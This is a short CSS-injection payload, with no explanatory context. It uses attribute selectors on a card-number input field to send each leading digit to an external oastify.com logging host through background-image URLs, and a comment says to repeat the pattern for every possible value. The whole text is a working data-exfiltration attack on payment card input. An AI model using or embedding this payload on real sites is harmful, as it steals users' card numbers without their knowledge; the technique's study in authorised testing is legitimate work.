input[name="cardno"][value^="1"] {
    background: url(https://l2o7yrzb9i8gsqrx63xteoh79yfr3ir7.oastify.com/log?card=1);
}
input[name="cardno"][value^="2"] {
    background: url(https://l2o7yrzb9i8gsqrx63xteoh79yfr3ir7.oastify.com/log?card=2);
}
input[name="cardno"][value^="3"] {
    background: url(https://l2o7yrzb9i8gsqrx63xteoh79yfr3ir7.oastify.com/log?card=3);
}
/* And so on for each possible value... */
